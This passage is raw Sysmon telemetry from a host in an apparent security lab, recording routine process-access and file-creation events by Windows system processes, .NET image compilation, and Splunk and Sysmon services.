13:51:44.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.334{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.334{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.287{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-A804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.287{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-A804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.287{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-A804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:44.209{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\5b8-0\UIAutomationClientsideProviders.dll2021-01-18 13:51:44.209 11241100x80000000000000008966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:45.896{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed4-0\XsdBuildTask.dll2021-01-18 13:51:45.896 10341000x80000000000000008965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.787{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.771{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.771{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B404-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B304-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.709{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B304-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.709{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B304-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:45.646{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10d0-0\XamlBuildTask.dll2021-01-18 13:51:45.646 10341000x80000000000000008958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.521{59A5CD1D-9271-6005-B204-00000000A301}44765008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.381{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program 